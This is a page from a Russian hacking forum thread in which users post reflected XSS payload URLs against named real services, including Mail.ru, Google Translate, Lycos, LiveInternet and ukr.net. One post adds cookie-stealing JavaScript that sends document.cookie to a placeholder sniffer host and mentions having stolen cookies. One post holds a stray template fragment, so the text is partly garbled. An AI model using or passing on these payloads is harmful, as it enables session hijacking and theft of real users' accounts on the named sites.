HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 23.01.2012, 21:06
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,7 3,67,72,65,84))
 
Ответить с цитированием

  #202  
Старый 26.01.2012, 21:25
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

LiveInternet

Код:
http://www.liveinternet.ru/jsearch/?s=">alert('xss')
 
Ответить с цитированием

  #203  
Старый 30.01.2012, 16:19
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

тИЦ 100

PR 7


Код:
http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/
 
Ответить с цитированием

  #204  
Старый 02.02.2012, 19:06
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Mail.ru

Код:
http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')
 
Ответить с цитированием

  #205  
Старый 04.02.2012, 10:27
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

kravch_v, не надо юзать HTML, если XSS внутри JS-кода.

http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
 
Ответить с цитированием

  #206  
Старый 04.02.2012, 19:44
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

M_script, спасибо!

Google XSS

Код:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код
Пример:

Код:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/
Для кражи кук используйте следующий код:

Код:
img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;
// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.
 
Ответить с цитированием

  #207  
Старый 04.02.2012, 20:12
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?

upd:

Цитата:
Сообщение от kravch_v  
Печеньки я каким-то образом крал
Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
 
Ответить с цитированием

  #208  
Старый 05.02.2012, 01:22
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Mail.Ru - Недостаточная фильтрация в cookie

Уязвимый код (cookie):

Код:
Mpop=test:test:test@test.ru">alert('xss');
Заходим на w2.dwar.mail.ru и код успешно выполняется.
 
Ответить с цитированием

  #209  
Старый 05.02.2012, 13:02
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Почта Укр.нет

[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+

[/QUOTE]
" if author else f"
Цитата:

По сути можно поставить onerror и onload, нужно только подумать как .
 
Ответить с цитированием

  #210  
Старый 05.02.2012, 13:56
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...